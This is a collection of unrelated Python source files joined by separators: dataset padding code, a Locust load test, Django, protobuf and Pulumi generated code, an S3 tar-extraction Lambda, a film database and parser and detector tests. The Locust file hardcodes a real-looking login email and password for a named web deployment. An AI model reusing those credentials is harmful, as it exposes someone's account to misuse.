index = np.linspace(start=0, stop=ori_video_len - 1, num=self.max_frames_num).astype(np.int32)
new_video = []
for i in range(len(index) - 1):
start = index[i]
end = index[i + 1]
if start == end or start + 1 == end:
new_video.append(vfeats[start])
else:
new_video.append(np.mean(vfeats[start: end], 0))
new_video.append(vfeats[-1])
vfeats = np.stack(new_video, 0)
v_sqrt = np.sqrt((vfeats * vfeats).sum(-1))[:, np.newaxis]
frame_mat = vfeats.dot(vfeats.T) / v_sqrt.dot(v_sqrt.T)
frame_mat = np.zeros_like(frame_mat) + np.triu(frame_mat, 2) + np.tril(frame_mat, -2)
frame_mat[frame_mat == 0] = 1
frame_mat[frame_mat < 0.7] = 0
label[0] = min(np.where(index >= label[0])[0])
if label[1] == ori_video_len - 1:
label[1] = self.max_frames_num - 1
else:
label[1] = max(np.where(index <= label[1])[0])
if label[1] < label[0]:
label[0] = label[1]
return vfeats, frame_mask, frame_mat, label
def __word_padding(self, word_vecs, word_mat, srl):
# padding words to a fixed num and adjust the word_mat
objects = []
actions = []
objects_list = []
actions_list = ['B-V','I-V']
srl_num = 0
if srl: #non-empty
srl_num = len(srl)
for srl_sent in srl:
dig_objects = []
dig_actions = []
for srl_word in srl_sent:
if srl_word == 'O':
dig_objects.append(0)
dig_actions.append(0)
elif srl_word in actions_list:
dig_objects.append(0)
dig_actions.append(1)
else:
dig_objects.append(1)
dig_actions.append(0)
objects.append(dig_objects)
actions.append(dig_actions)
objects = np.array(objects, np.uint8)
actions = np.array(actions, np.uint8)
ori_srl_num = len(srl)
ori_srl_sent_num = len(srl[0])
if ori_srl_num < self.max_srl_num:
if ori_srl_sent_num < self.max_words_num:
objects = np.pad(objects, ((0, self.max_srl_num - ori_srl_num), (0, self.max_words_num - ori_srl_sent_num)), mode='constant')
actions = np.pad(actions, ((0, self.max_srl_num - ori_srl_num), (0, self.max_words_num - ori_srl_sent_num)), mode='constant')
else:
objects = objects[:, :self.max_words_num]
objects = np.pad(objects, ((0, self.max_srl_num - ori_srl_num), (0, 0)), mode='constant')
actions = actions[:, :self.max_words_num]
actions = np.pad(actions, ((0, self.max_srl_num - ori_srl_num), (0, 0)), mode='constant')
else:
objects = objects[:self.max_srl_num]
actions = actions[:self.max_srl_num]
if ori_srl_sent_num < self.max_words_num:
objects = np.pad(objects, ((0, 0), (0, self.max_words_num - ori_srl_sent_num)), mode='constant')
actions = np.pad(actions, ((0, 0), (0, self.max_words_num - ori_srl_sent_num)), mode='constant')
else:
objects = objects[:, :self.max_words_num]
actions = actions[:, :self.max_words_num]
else:
objects = np.zeros((self.max_srl_num, self.max_words_num), np.uint8)
actions = np.zeros((self.max_srl_num, self.max_words_num), np.uint8)
ori_words_num = word_vecs.shape[0]
if ori_words_num < self.max_words_num:
word_mask = np.zeros([self.max_words_num], np.uint8)
word_mask[range(ori_words_num)] = 1
word_vecs = np.pad(word_vecs, ((0, self.max_words_num - ori_words_num), (0, 0)), mode='constant')
word_mat = np.pad(word_mat,
((0, self.max_words_num - word_mat.shape[0]),
(0, self.max_words_num - word_mat.shape[1])),
mode='constant')
else:
word_mask = np.ones([self.max_words_num], np.uint8)
word_vecs = word_vecs[:self.max_words_num]
word_mat = word_mat[:self.max_words_num, :self.max_words_num]
word_mat = (word_mat != 0).astype(np.float)
word_mat = word_mat + word_mat.T - np.ones(word_mat.shape[0])
return word_vecs, word_mask, word_mat, objects, actions, srl_num
def __cal_candidate_scores(self, label, frame_mask, duration):
seq_len = np.sum(frame_mask, -1)
labels = np.repeat(np.expand_dims(label, 0), self.candidates.shape[0], 0) # candidate_num x 2
IoUs = calculate_IoU_batch(
(self.candidates[:, 0] * duration / seq_len, (self.candidates[:, 1] + 1) * duration / seq_len),
(labels[:, 0] * duration / seq_len, (labels[:, 1] + 1) * duration / seq_len)
)
max_IoU = np.max(IoUs)
if max_IoU == 0.0:
print(label)
exit(1)
IoUs[IoUs < 0.3 * max_IoU] = 0.0
IoUs = IoUs / max_IoU
scores = IoUs.astype(np.float32)
return scores
|
import time
from locust import HttpUser, task, between
class QuickstartUser(HttpUser):
wait_time = between(1, 2.5)
host = "https://konec-mvno-web-cpjfbnt2q-oppo-dev.vercel.app/" #定义主机
@task(1)
def my_1_task(self):
self.client.get("/support") #请求support页面
@task(2)
def my_2_task(self):
self.client.get("/plans") #请求But a plant页面
@task(3)
def my_3_task(self):
self.client.get("/coverage") #请求coverage页面
@task(4)
def my_4_task(self):
self.client.get("/about") #请求Why us页面
@task(5)
def login(self):
self.client.post(
"/api/auth/login", {"username": "konecau002@gmail.com", "password": "Sps@123456"})
@task(6)
def my_6_task(self):
self.client.get("/_next/data/5sSK9Ibf6E-Zf9cIdOh68/activation.json")
if __name__=='__main__':
import os
os.system('locust -f aaa.py')
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-03-09 02:19
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('braintreepayment', '0002_payment_refactor'),
]
operations = [
migrations.AlterField(
model_name='braintreetransaction',
name='amount',
field=models.DecimalField(decimal_places=2, max_digits=20),
),
]
|
# Copyright 2020 Thomas Rogers
# SPDX-License-Identifier: Apache-2.0
from .. import map_objects
class SpriteFacing:
def __init__(self, sprite: map_objects.EditorSprite):
self._sprite = sprite
def change_facing(self):
self._sprite.invalidate_geometry()
stat = self._sprite.sprite.sprite.stat
stat.facing = (stat.facing + 1) % 3
|
# By Chris Bailey-Kellogg for "Balancing sensitivity and specificity in
# distinguishing TCR groups by CDR sequence similarity"
# See README for license information
import csv, sys
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
# args:
# 1: cdr id -- a3 or b3
# [2]: stcr_results directory (defaults to results/stcr_results/)
cdr_id = sys.argv[1]
if len(sys.argv)>2:
results_dir = sys.argv[2]
if results_dir[-1] != '/': results_dir += '/'
else:
results_dir = 'results/stcr_results/'
# (cdr, nbr) -> distance, for both sequence and structural distances
seq_dists = {}
struct_dists = {}
# seq -> nearest seq nbr in same or other cluster
same = {}
other = {}
for row in csv.DictReader(open(results_dir+cdr_id+'_stcr_pairs.csv')):
seq_dists[row['cdr'],row['nbr']] = float(row['seq dist'])
if row['cluster'] == row['nbr cluster']: same[row['cdr']] = row['nbr']
else: other[row['cdr']] = row['nbr']
for row in csv.DictReader(open(results_dir+cdr_id+'_pair_rmsds.csv')):
struct_dists[row['cdr'],row['nbr']] = float(row['rmsd'])
assert(set(same.keys()) == set(other.keys()))
# save out compiled distances
with open(results_dir+cdr_id+'_seq_vs_struct.csv','w') as outfile:
csvout = csv.writer(outfile)
csvout.writerow(['cdr','correct','snbr','snbr seq','snbr struct','onbr','onbr seq','onbr struct','delta seq','delta struct'])
for cdr in same:
snbr = same[cdr]; onbr = other[cdr]
csvout.writerow([cdr, 1 if seq_dists[cdr,snbr]<=seq_dists[cdr,onbr] else 0,
snbr, seq_dists[cdr,snbr], struct_dists.get((cdr,snbr),''),
onbr, seq_dists[cdr,onbr], struct_dists.get((cdr,onbr),''),
seq_dists[cdr,snbr] - seq_dists[cdr,onbr],
struct_dists[cdr,snbr] - struct_dists[cdr,onbr] if ((cdr,snbr) in struct_dists and (cdr,onbr) in struct_dists) else ''])
# for each cdr, plot delta seq (same vs. other nbr) vs. delta struct
# different color for correct vs. incorrect classifications, though that's redundant since quadrant makes that clear
cmap = plt.cm.get_cmap('gnuplot2') # see https://matplotlib.org/examples/color/colormaps_reference.html
fig = plt.figure()
plt.axvline(x=0, color='gray', linestyle='--')
plt.axhline(y=0, color='gray', linestyle='--')
for cdr in same:
snbr = same[cdr]; onbr = other[cdr]
if (cdr,snbr) not in struct_dists:
print 'no struct_dist for',cdr,snbr
continue
if (cdr,onbr) not in struct_dists:
print 'no struct_dist for',cdr,onbr
continue
seq_delta = seq_dists[cdr,snbr]-seq_dists[cdr,onbr]
struct_delta = struct_dists[cdr,snbr]-struct_dists[cdr,onbr]
plt.plot(seq_delta, struct_delta, '.', markersize=12, color=cmap(seq_dists[cdr,snbr]))
plt.xticks(fontsize=15)
plt.yticks(fontsize=15)
plt.xlabel('$\Delta$ seq', fontsize=18)
plt.ylabel('$\Delta$ struct', fontsize=18)
divider = make_axes_locatable(plt.gca())
cax = divider.new_horizontal(size="5%", pad=0.2, pack_start=False) # thanks to https://stackoverflow.com/questions/13310594/positioning-the-colorbar
fig.add_axes(cax)
cb = mpl.colorbar.ColorbarBase(cax, cmap=cmap, orientation='vertical')
cb.set_label('seq dist', fontsize=15)
plt.tight_layout()
plt.savefig(results_dir+cdr_id+'_seq_vs_struct.pdf')
|
import os
from django.conf import settings
from django.core.management import call_command
from django.db import connection
def spatialite_init_file():
# SPATIALITE_SQL may be placed in settings to tell
# GeoDjango to use a specific user-supplied file.
return getattr(settings, 'SPATIALITE_SQL', 'init_spatialite-2.3.sql')
def create_test_spatial_db(verbosity=1, autoclobber=False, interactive=False):
"Creates a spatial database based on the settings."
# Making sure we're using PostgreSQL and psycopg2
if settings.DATABASE_ENGINE != 'sqlite3':
raise Exception('SpatiaLite database creation only supported on sqlite3 platform.')
# Getting the test database name using the SQLite backend's
# `_create_test_db`. Unless `TEST_DATABASE_NAME` is defined,
# it returns ":memory:".
db_name = connection.creation._create_test_db(verbosity, autoclobber)
# Closing out the current connection to the database set in
# originally in the settings. This makes it so `initialize_spatialite`
# function will be run on the connection for the _test_ database instead.
connection.close()
# Point to the new database
settings.DATABASE_NAME = db_name
connection.settings_dict["DATABASE_NAME"] = db_name
can_rollback = connection.creation._rollback_works()
settings.DATABASE_SUPPORTS_TRANSACTIONS = can_rollback
connection.settings_dict["DATABASE_SUPPORTS_TRANSACTIONS"] = can_rollback
# Finally, loading up the SpatiaLite SQL file.
load_spatialite_sql(db_name, verbosity=verbosity)
if verbosity >= 1:
print 'Creation of spatial database %s successful.' % db_name
# Syncing the database
call_command('syncdb', verbosity=verbosity, interactive=interactive)
def load_spatialite_sql(db_name, verbosity=1):
"""
This routine loads up the SpatiaLite SQL file.
"""
# Getting the location of the SpatiaLite SQL file, and confirming
# it exists.
spatialite_sql = spatialite_init_file()
if not os.path.isfile(spatialite_sql):
raise Exception('Could not find the SpatiaLite initialization SQL file: %s' % spatialite_sql)
# Opening up the SpatiaLite SQL initialization file and executing
# as a script.
sql_fh = open(spatialite_sql, 'r')
try:
cur = connection.cursor()
cur.executescript(sql_fh.read())
finally:
sql_fh.close()
|
def swap_with_head(self, head, n):
headVal = head.val
current=head
count = 0
while(current and current.next):
count += 1
if count == n:
head.val = current.val
current.val = headVal
current = current.next
return head
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
from google.protobuf import descriptor
from google.protobuf import message
from google.protobuf import reflection
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
DESCRIPTOR = descriptor.FileDescriptor(
name='repeated_packed.proto',
package='',
serialized_pb='\n\x15repeated_packed.proto\"\x1a\n\x05Thing\x12\x11\n\x05parts\x18\x04 \x03(\x05\x42\x02\x10\x01')
_THING = descriptor.Descriptor(
name='Thing',
full_name='Thing',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(
name='parts', full_name='Thing.parts', index=0,
number=4, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\020\001')),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=25,
serialized_end=51,
)
DESCRIPTOR.message_types_by_name['Thing'] = _THING
class Thing(message.Message):
__metaclass__ = reflection.GeneratedProtocolMessageType
DESCRIPTOR = _THING
# @@protoc_insertion_point(class_scope:Thing)
# @@protoc_insertion_point(module_scope)
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._enums import *
__all__ = [
'GetTaskDefinitionResult',
'AwaitableGetTaskDefinitionResult',
'get_task_definition',
'get_task_definition_output',
]
@pulumi.output_type
class GetTaskDefinitionResult:
def __init__(__self__, arn=None, auto_create_tasks=None, id=None, lo_ra_wan_update_gateway_task_entry=None, name=None, tags=None, task_definition_type=None, update=None):
if arn and not isinstance(arn, str):
raise TypeError("Expected argument 'arn' to be a str")
pulumi.set(__self__, "arn", arn)
if auto_create_tasks and not isinstance(auto_create_tasks, bool):
raise TypeError("Expected argument 'auto_create_tasks' to be a bool")
pulumi.set(__self__, "auto_create_tasks", auto_create_tasks)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if lo_ra_wan_update_gateway_task_entry and not isinstance(lo_ra_wan_update_gateway_task_entry, dict):
raise TypeError("Expected argument 'lo_ra_wan_update_gateway_task_entry' to be a dict")
pulumi.set(__self__, "lo_ra_wan_update_gateway_task_entry", lo_ra_wan_update_gateway_task_entry)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if tags and not isinstance(tags, list):
raise TypeError("Expected argument 'tags' to be a list")
pulumi.set(__self__, "tags", tags)
if task_definition_type and not isinstance(task_definition_type, str):
raise TypeError("Expected argument 'task_definition_type' to be a str")
pulumi.set(__self__, "task_definition_type", task_definition_type)
if update and not isinstance(update, dict):
raise TypeError("Expected argument 'update' to be a dict")
pulumi.set(__self__, "update", update)
@property
@pulumi.getter
def arn(self) -> Optional[str]:
"""
TaskDefinition arn. Returned after successful create.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="autoCreateTasks")
def auto_create_tasks(self) -> Optional[bool]:
"""
Whether to automatically create tasks using this task definition for all gateways with the specified current version. If false, the task must me created by calling CreateWirelessGatewayTask.
"""
return pulumi.get(self, "auto_create_tasks")
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
The ID of the new wireless gateway task definition
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="loRaWANUpdateGatewayTaskEntry")
def lo_ra_wan_update_gateway_task_entry(self) -> Optional['outputs.TaskDefinitionLoRaWANUpdateGatewayTaskEntry']:
"""
The list of task definitions.
"""
return pulumi.get(self, "lo_ra_wan_update_gateway_task_entry")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
The name of the new resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def tags(self) -> Optional[Sequence['outputs.TaskDefinitionTag']]:
"""
A list of key-value pairs that contain metadata for the destination.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="taskDefinitionType")
def task_definition_type(self) -> Optional['TaskDefinitionType']:
"""
A filter to list only the wireless gateway task definitions that use this task definition type
"""
return pulumi.get(self, "task_definition_type")
@property
@pulumi.getter
def update(self) -> Optional['outputs.TaskDefinitionUpdateWirelessGatewayTaskCreate']:
"""
Information about the gateways to update.
"""
return pulumi.get(self, "update")
class AwaitableGetTaskDefinitionResult(GetTaskDefinitionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetTaskDefinitionResult(
arn=self.arn,
auto_create_tasks=self.auto_create_tasks,
id=self.id,
lo_ra_wan_update_gateway_task_entry=self.lo_ra_wan_update_gateway_task_entry,
name=self.name,
tags=self.tags,
task_definition_type=self.task_definition_type,
update=self.update)
def get_task_definition(id: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetTaskDefinitionResult:
"""
Creates a gateway task definition.
:param str id: The ID of the new wireless gateway task definition
"""
__args__ = dict()
__args__['id'] = id
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws-native:iotwireless:getTaskDefinition', __args__, opts=opts, typ=GetTaskDefinitionResult).value
return AwaitableGetTaskDefinitionResult(
arn=__ret__.arn,
auto_create_tasks=__ret__.auto_create_tasks,
id=__ret__.id,
lo_ra_wan_update_gateway_task_entry=__ret__.lo_ra_wan_update_gateway_task_entry,
name=__ret__.name,
tags=__ret__.tags,
task_definition_type=__ret__.task_definition_type,
update=__ret__.update)
@_utilities.lift_output_func(get_task_definition)
def get_task_definition_output(id: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetTaskDefinitionResult]:
"""
Creates a gateway task definition.
:param str id: The ID of the new wireless gateway task definition
"""
...
|
import json
import boto3
import botocore
import tarfile
from io import BytesIO
s3_client = boto3.client('s3')
def lambda_handler(event, context):
inputbucket = "yourinputbucket"
destbucket = "yourdestbucket"
key = event['Records'][0]['s3']['object']['key']
#gets tar file from s3
input_tar_file = s3_client.get_object(Bucket = inputbucket, Key = key)
input_tar_content = input_tar_file['Body'].read()
#open file in memory to avoid storage constraints
with tarfile.open(fileobj = BytesIO(input_tar_content)) as tar:
for tar_resource in tar:
if (tar_resource.isfile()):
#extract and reupload to s3
inner_file_bytes = tar.extractfile(tar_resource).read()
s3_client.upload_fileobj(BytesIO(inner_file_bytes), Bucket = destbucket, Key = (tar_resource.name))
return {
'statusCode': 200,
'body': json.dumps('Hello from Lambda!')
}
|
from pomozne_funkcije import Seznam
import baza
import sqlite3
from geslo import sifriraj_geslo, preveri_geslo
conn = sqlite3.connect('filmi.db')
baza.ustvari_bazo_ce_ne_obstaja(conn)
conn.execute('PRAGMA foreign_keys = ON')
uporabnik, zanr, oznaka, film, oseba, vloga, pripada = baza.pripravi_tabele(conn)
class LoginError(Exception):
"""
Napaka ob napačnem uporabniškem imenu ali geslu.
"""
pass
class Uporabnik:
"""
Razred za uporabnika.
"""
insert = uporabnik.dodajanje(["ime", "zgostitev", "sol"])
def __init__(self, ime, id=None):
"""
Konstruktor uporabnika.
"""
self.id = id
self.ime = ime
def __str__(self):
"""
Znakovna predstavitev uporabnika.
Vrne uporabniško ime.
"""
return self.ime
@staticmethod
def prijava(ime, geslo):
"""
Preveri, ali sta uporabniško ime geslo pravilna.
"""
sql = """
SELECT id, zgostitev, sol FROM uporabnik
WHERE ime = ?
"""
try:
id, zgostitev, sol = conn.execute(sql, [ime]).fetchone()
if preveri_geslo(geslo, zgostitev, sol):
return Uporabnik(ime, id)
except TypeError:
pass
raise LoginError(ime)
def dodaj_v_bazo(self, geslo):
"""
V bazo doda uporabnika s podanim geslom.
"""
assert self.id is None
zgostitev, sol = sifriraj_geslo(geslo)
with conn:
self.id = uporabnik.dodaj_vrstico(
[self.ime, zgostitev, sol],
self.insert
)
class Film:
"""
Razred za film.
"""
insert = film.dodajanje(["naslov", "leto", "ocena"])
insert_vloga = vloga.dodajanje(["film", "oseba", "tip"])
def __init__(self, id, naslov, leto, ocena):
"""
Konstruktor filma.
"""
self.id = id
self.naslov = naslov
self.leto = leto
self.ocena = ocena
def __str__(self):
"""
Znakovna predstavitev filma.
Vrne naslov filma.
"""
return self.naslov
@staticmethod
def najboljsi_v_letu(leto):
"""
Vrne najboljših 10 filmov v danem letu.
"""
sql = """
SELECT id, naslov, leto, ocena
FROM film
WHERE leto = ? AND glasovi > 100000
ORDER BY ocena DESC
LIMIT 10
"""
for id, naslov, leto, ocena in conn.execute(sql, [leto]):
yield Film(id, naslov, leto, ocena)
def dodaj_v_bazo(self, reziserji, igralci):
"""
V bazo doda film s podanimi režiserji in igralci
"""
assert self.id is None
with conn:
id = film.dodaj_vrstico(
[self.naslov, self.leto, self.ocena],
self.insert
)
for oseba in reziserji:
vloga.dodaj_vrstico(
[id, oseba.id, TipVloge.R.name],
self.insert_vloga
)
for oseba in igralci:
vloga.dodaj_vrstico(
[id, oseba.id, TipVloge.I.name],
self.insert_vloga
)
self.id = id
class Oseba:
"""
Razred za osebo.
"""
insert = oseba.dodajanje(["ime"])
def __init__(self, ime, id=None):
"""
Konstruktor osebe.
"""
self.id = id
self.ime = ime
def __str__(self):
"""
Znakovna predstavitev osebe.
Vrne ime osebe.
"""
return self.ime
def poisci_vloge(self):
"""
Vrne vloge osebe.
"""
sql = """
SELECT film.naslov, film.leto, vloga.tip
FROM film
JOIN vloga ON film.id = vloga.film
WHERE vloga.oseba = ?
ORDER BY leto
"""
for naslov, leto, tip_vloge in conn.execute(sql, [self.id]):
yield (naslov, leto, TipVloge[tip_vloge])
@staticmethod
def poisci(niz):
"""
Vrne vse osebe, ki v imenu vsebujejo dani niz.
"""
sql = "SELECT id, ime FROM oseba WHERE ime LIKE ?"
for id, ime in conn.execute(sql, ['%' + niz + '%']):
yield Oseba(ime=ime, id=id)
def dodaj_v_bazo(self):
"""
Doda osebo v bazo.
"""
assert self.id is None
with conn:
self.id = oseba.dodaj_vrstico([self.ime], self.insert)
class TipVloge(Seznam):
"""
Oznake za tip vloge.
"""
I = 'igralec'
R = 'režiser'
|
import os
from pysports import parse_text, _parse_all_table_tags, _parse_all_table_names, _parse_all_column_headers, _parse_all_data
from bs4 import BeautifulSoup
cwd = os.path.dirname(os.path.realpath(__file__))
one_table_full_text = None
one_table_full_text_soup = None
complicated = None
complicated_soup = None
multiple_headers = None
multiple_headers_soup = None
updated_table = None
updated_table_soup = None
def setup():
global one_table_full_text
global one_table_full_text_soup
global complicated
global complicated_soup
global multiple_headers
global multiple_headers_soup
global updated_table
global updated_table_soup
with open(cwd + '/drafts_small.html') as handle:
one_table_full_text = handle.read()
one_table_full_text_soup = BeautifulSoup(one_table_full_text)
with open(cwd + '/superbowl_complicated.html') as handle:
complicated = handle.read()
complicated_soup = BeautifulSoup(complicated)
with open(cwd + '/single_table_multiple_headers.html') as handle:
multiple_headers = handle.read()
multiple_headers_soup = BeautifulSoup(multiple_headers)
with open(cwd + '/2015_draft.html') as handle:
updated_table = handle.read()
updated_table_soup = BeautifulSoup(updated_table)
def test_parse_all_table_tags():
soup = one_table_full_text_soup
tables = _parse_all_table_tags(soup)
assert len(tables) == 1
table = tables[0]
assert len(table.find_all('tr')) == 7
soup = complicated_soup
tables = _parse_all_table_tags(soup)
assert len(tables) == 9
assert len(tables[0].find_all('tr')) == 4
assert len(tables[1].find_all('tr')) == 6
assert len(tables[5].find_all('tr')) == 16
soup = multiple_headers_soup
tables = _parse_all_table_tags(soup)
assert len(tables) == 1
soup = updated_table_soup
tables = _parse_all_table_tags(soup)
assert len(tables) == 2
assert len(tables[0].find_all('tr')) == 270
assert len(tables[1].find_all('tr')) == 3
def test_parse_all_table_names():
soup = one_table_full_text_soup
titles = _parse_all_table_names(soup)
assert len(titles) == 1
assert type(titles[0]) == unicode
assert titles[0] == 'Drafted Players'
soup = complicated_soup
titles = _parse_all_table_names(soup)
assert len(titles) == 9
assert titles[1] == 'To Go'
assert titles[3] == 'Team Defense'
assert titles[8] == 'Individual Plays'
soup = multiple_headers_soup
titles = _parse_all_table_names(soup)
assert len(titles) == 1
assert titles[0] == 'Drafted Players'
soup = updated_table_soup
titles = _parse_all_table_names(soup)
assert len(titles) == 2
assert titles[0] == 'Drafted Players'
assert titles[1] == 'Supplemental Draft'
def test_parse_all_column_headers():
soup = one_table_full_text_soup
all_headers = _parse_all_column_headers(soup)
headers = all_headers[0]
assert headers[0].display_name == 'Rk'
assert headers[0].class_name == 'ranker'
assert headers[5].display_name == 'Pos'
assert headers[5].class_name == 'pos'
assert headers[7].display_name == 'Tm'
assert len(headers) == 32
soup = complicated_soup
all_headers = _parse_all_column_headers(soup)
assert len(all_headers) == 9
assert len(all_headers[0]) == 3
assert all_headers[0][0].display_name == 'Down'
assert all_headers[0][0].class_name is None
assert len(all_headers[2]) == 15
assert all_headers[2][0].display_name == 'Tm'
assert all_headers[2][0].class_name is None
assert all_headers[2][5].display_name == '1st%'
assert all_headers[2][5].class_name is None
assert len(all_headers[3]) == 15
assert len(all_headers[8]) == 14
assert all_headers[8][13].display_name is None
assert all_headers[8][13].class_name == 'exp_pts_diff'
soup = multiple_headers_soup
all_headers = _parse_all_column_headers(soup)
assert len(all_headers) == 1
headers = all_headers[0]
assert len(headers) == 32
assert headers[0].display_name == 'Rk'
assert headers[0].class_name == 'ranker'
assert headers[4].display_name is None
assert headers[4].class_name == 'player'
assert headers[30].display_name == 'College/Univ'
assert headers[30].class_name == 'college_id'
soup = updated_table_soup
all_headers = _parse_all_column_headers(soup)
assert len(all_headers) == 2
headers = all_headers[0]
assert len(headers) == 29
assert headers[0].display_name == 'Rnd'
assert headers[0].class_name == 'draft_round'
assert headers[3].display_name is None
assert headers[3].class_name == 'player'
def test_parse_all_data():
soup = one_table_full_text_soup
all_tables_rows, all_totals = _parse_all_data(soup)
rows = all_tables_rows[0]
assert len(rows) == 5
assert rows[0][0] == 1
assert type(rows[0][0]) == int
assert rows[0][7] == 'HOU'
assert type(rows[0][7]) == unicode
assert rows[2][1] == 2014
assert type(rows[2][1]) == int
assert rows[2][16] == '3-10-0'
assert type(rows[2][16]) == unicode
assert len(all_totals) == 1
assert all_totals[0] is None
soup = complicated_soup
all_tables_rows, all_totals = _parse_all_data(soup)
assert len(all_tables_rows) == 9
assert len(all_tables_rows[5]) == 13
assert len(all_tables_rows[7]) == 27
assert all_tables_rows[0][0][0] == 'First'
assert all_tables_rows[8][1][7] == 'SEA 45'
assert type(all_tables_rows[8][0][3]) == int
assert type(all_tables_rows[8][0][8]) == unicode
assert all_tables_rows[8][-1][4] == '11:49'
assert len([x for x in all_totals if x is not None]) == 7
assert all_totals[2][0] == 'Pct'
assert all_totals[0] is None
soup = multiple_headers_soup
all_tables_rows, all_totals = _parse_all_data(soup)
assert all_totals == [None]
assert len(all_tables_rows) == 1
assert len(all_tables_rows[0]) == 256
assert all_tables_rows[0][254][4] == 'Tyler Starr'
assert type(all_tables_rows[0][254][0]) == int
soup = updated_table_soup
all_tables_rows, all_totals = _parse_all_data(soup)
assert all_totals == [None, None]
assert len(all_tables_rows) == 2
table_rows = all_tables_rows[0]
assert len(table_rows) == 256
assert table_rows[0][3] == u'Jameis Winston'
assert table_rows[1][27] == 'Oregon'
assert type(table_rows[0][0]) == int
def test_parse_text():
# Test out one table, full text, not many results
tables = parse_text(one_table_full_text)
assert len(tables) == 1
assert 'Search Form' not in [x.title for x in tables]
test_table = tables[0]
assert test_table.title == 'Drafted Players'
assert len(test_table.headers) == 32
assert test_table.valid() is True
assert len(test_table) == 5
# Testing out muliple headers
tables = parse_text(multiple_headers)
assert len(tables) == 1
assert tables[0].title == 'Drafted Players'
test_table = tables[0]
assert len(test_table.headers) == 32
assert test_table.valid() is True
assert len(test_table) == 256
assert test_table[254][4] == 'Tyler Starr'
assert test_table[0][4] == 'Jadeveon Clowney'
# Test out multiple tables real fast
tables = parse_text(complicated)
assert len(tables) == 9
for table in tables:
assert table.valid() is True
length_spec = [3, 4, 2, 2, 2, 13, 8, 27, 125]
for index, dummy in enumerate(length_spec):
assert len(tables[index]) == length_spec[index]
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from analysis import callstack_detectors
from analysis.analysis_testcase import AnalysisTestCase
from analysis.callstack_detectors import StartOfCallStack
from analysis.flag_manager import ParsingFlag
from analysis.flag_manager import FlagManager
from analysis.type_enums import CallStackFormatType
from analysis.type_enums import LanguageType
class CallStackDetectorTest(AnalysisTestCase):
def testAndroidJobDetector(self):
"""Tests that ``AndroidJobDetector`` detects android job callstack."""
stack_detector = callstack_detectors.AndroidJobDetector()
flag_manager = FlagManager()
flag_manager.Register('group',
ParsingFlag('java_main_stack_flag', value=True))
self.assertTupleEqual(
stack_detector('java.lang.IllegalStateException: blabla', flag_manager),
StartOfCallStack(0, CallStackFormatType.JAVA, LanguageType.JAVA, {}))
self.assertTupleEqual(
stack_detector('org.chromium.src.BlaBla', flag_manager),
StartOfCallStack(1, CallStackFormatType.JAVA, LanguageType.JAVA, {}))
self.assertTupleEqual(
stack_detector('Caused by:', flag_manager),
StartOfCallStack(1, CallStackFormatType.JAVA, LanguageType.JAVA, {}))
self.assertTupleEqual(
stack_detector('com.google.android.BlaBla', flag_manager),
StartOfCallStack(1, CallStackFormatType.JAVA, LanguageType.JAVA, {}))
self.assertIsNone(stack_detector('dummy', flag_manager))
def testSyzyasanDetector(self):
"""Tests that ``SyzyasanDetector`` detects sysyasn callstack."""
stack_detector = callstack_detectors.SyzyasanDetector()
self.assertTupleEqual(
stack_detector('Crash stack:'),
StartOfCallStack(0, CallStackFormatType.SYZYASAN, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('Allocation stack:'),
StartOfCallStack(1, CallStackFormatType.SYZYASAN, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('dummy'))
def testTsanDetector(self):
"""Tests that ``TsanDetector`` detects thread sanitizer callstack."""
stack_detector = callstack_detectors.TsanDetector()
self.assertTupleEqual(
stack_detector('Read of size 1023:'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('WARNING: ThreadSanitizer'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('Previous read of size 102'),
StartOfCallStack(1, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('Location is heap block of size 3543'),
StartOfCallStack(1, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('dummy'))
def testUbsanDetector(self):
"""Tests that ``UbsanDetector`` detects ubsan callstack."""
stack_detector = callstack_detectors.UbsanDetector()
flag_manager = FlagManager()
flag_manager.Register('group',
ParsingFlag('is_first_stack_flag', value=True))
self.assertTupleEqual(
stack_detector('blabla: runtime error: blabla', flag_manager),
